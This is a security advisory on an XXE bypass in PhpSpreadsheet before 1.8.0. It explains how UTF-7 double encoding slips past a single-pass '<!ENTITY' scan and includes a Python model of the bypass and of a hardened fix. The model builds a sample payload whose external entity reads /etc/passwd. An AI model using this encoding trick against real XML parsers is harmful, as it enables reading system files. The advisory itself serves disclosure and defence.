PHPOffice PhpSpreadsheet before 1.8.0 Improper Restriction of XML External Entity Reference Vulnerability


PHPOffice PhpSpreadsheet before 1.8.0 has an XXE issue. The XmlScanner converts the sheet1.xml inside an .xlsx to UTF-8 whenever the XML header declares an encoding other than UTF-8.


The information has been provided by Daniel Hoffmann

The original article can be found at:



The conversion was introduced as a security measure: after converting the document to UTF-8, XmlScanner searches the result for the string "<!ENTITY" and aborts the load if it is found. The fix is not sufficient, because the conversion runs only once while the XML declaration still names the original charset. By double-encoding the XML payload in UTF-7, the string "<!ENTITY" is still UTF-7 encoded after that single conversion, so the check does not match; the XML parser then honours the declared encoding and decodes the document a second time, revealing the entity declaration and allowing XML external entity (XXE) processing.
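The following Python model reproduces the bypass described above. It is an added illustration written for this advisory, not code from PhpSpreadsheet: the scanner, the parser view and the hardened conversion are simplified stand-ins with names of my own choosing, the XML payload is constructed inline, and the "redeclare as UTF-8" hardening is one reasonable defence rather than a claim about what the 1.8.0 patch does.

```python
"""Model of the UTF-7 double-encoding bypass against a single-pass <!ENTITY scan.

Added illustration, not PhpSpreadsheet code: scanner, parser view and fix are
simplified stand-ins written for this advisory; the payload is constructed here.
"""
import base64
import re
import string

# RFC 2152 Set D plus whitespace are emitted as-is; everything else is base64-shifted.
# Python's own 'utf-7' codec leaves '<' and '!' unencoded, so it cannot hide the marker.
_DIRECT = set(string.ascii_letters + string.digits + "'(),-./:? \t\r\n")

ENCODING_DECL = re.compile(rb'encoding="([^"]*)"')
ENTITY_MARKER = re.compile(rb'<!ENTITY')

XML_DECL = b'<?xml version="1.0" encoding="UTF-7"?>'
# Constructed sample: an external-entity DTD followed by a sheet-like body.
BODY = ('<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        '<worksheet><c><v>&xxe;</v></c></worksheet>')


def utf7_encode(text: str) -> bytes:
    """Encode text as UTF-7, base64-shifting every character outside _DIRECT."""
    out = bytearray()
    pending = []  # characters collected for the next +...- shift sequence

    def flush():
        if pending:
            b64 = base64.b64encode(''.join(pending).encode('utf-16-be')).rstrip(b'=')
            out.extend(b'+' + b64 + b'-')
            pending.clear()

    for ch in text:
        if ch in _DIRECT:
            flush()
            out.append(ord(ch))
        else:
            pending.append(ch)
    flush()
    return bytes(out)


def build_payload(double: bool) -> bytes:
    """UTF-7 document; with double=True the body is UTF-7-encoded twice."""
    body = utf7_encode(BODY)
    if double:
        body = utf7_encode(body.decode('ascii'))  # the first-level '+' signs get shifted too
    return XML_DECL + body


def declared_charset(doc: bytes) -> str:
    m = ENCODING_DECL.search(doc)
    return m.group(1).decode('ascii') if m else 'UTF-8'


def to_utf8_once(doc: bytes) -> bytes:
    """Vulnerable conversion: decode the declared charset once, keep the declaration."""
    return doc.decode(declared_charset(doc)).encode('utf-8')


def to_utf8_and_redeclare(doc: bytes) -> bytes:
    """Hardened variant (my approach, not necessarily the project's patch):
    after converting, rewrite the declaration so nothing downstream decodes again."""
    return ENCODING_DECL.sub(b'encoding="UTF-8"', to_utf8_once(doc), count=1)


def parser_view(doc: bytes) -> bytes:
    """What an XML parser that honours the encoding declaration actually parses."""
    return doc.decode(declared_charset(doc)).encode('utf-8')


def run_pipeline(doc: bytes, convert) -> tuple:
    """Returns (rejected_by_scanner, entity_reaches_parser)."""
    converted = convert(doc)
    if ENTITY_MARKER.search(converted) is not None:
        return True, False
    return False, ENTITY_MARKER.search(parser_view(converted)) is not None


if __name__ == '__main__':
    for label, doc in (('single-encoded', build_payload(False)),
                       ('double-encoded', build_payload(True))):
        print(label, 'vulnerable:', run_pipeline(doc, to_utf8_once),
              'hardened:', run_pipeline(doc, to_utf8_and_redeclare))
```

With the single-encoded payload the one-pass conversion exposes "<!ENTITY" and the scan rejects the file. With the double-encoded payload the scan sees only base64 shift sequences and passes the document on, but the declaration still says UTF-7, so a parser that honours it decodes once more and the entity declaration reappears. Rewriting the declaration after conversion closes that gap in this model; an even simpler policy is to refuse any declared charset other than UTF-8 outright.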


Vulnerable Systems:

PHPOffice PhpSpreadsheet before 1.8.0 


CVE Information:



Disclosure Timeline:
Published Date: 11/7/2019